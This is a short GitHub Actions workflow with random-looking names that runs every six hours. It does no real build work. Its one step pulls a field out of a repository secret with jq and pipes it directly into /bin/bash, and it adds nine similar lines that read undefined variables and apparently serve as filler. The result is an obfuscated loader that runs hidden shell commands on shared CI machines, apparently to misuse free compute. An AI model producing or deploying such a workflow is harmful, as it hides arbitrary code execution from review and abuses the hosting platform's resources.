name: tujiulong4219
on:
  workflow_dispatch:
  schedule:
    - cron: '51 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tujiulong4219
        env:
          y07281: ${{ secrets.y07281 }}
        run: |
          echo $y07281 | jq -r .i61 | /bin/bash
          echo $lvxmi85433 | jq -r .gwhs41 | /bin/bash
          echo $hkbx419 | jq -r .h35119 | /bin/bash
          echo $dafm457 | jq -r .n74 | /bin/bash
          echo $v1 | jq -r .wauok57099 | /bin/bash
          echo $qyq198 | jq -r .zsbwe73033 | /bin/bash
          echo $r6 | jq -r .jaj95720 | /bin/bash
          echo $eegy2345 | jq -r .w18604 | /bin/bash
          echo $a8234 | jq -r .j29 | /bin/bash
          echo $sop45240 | jq -r .z6216 | /bin/bash

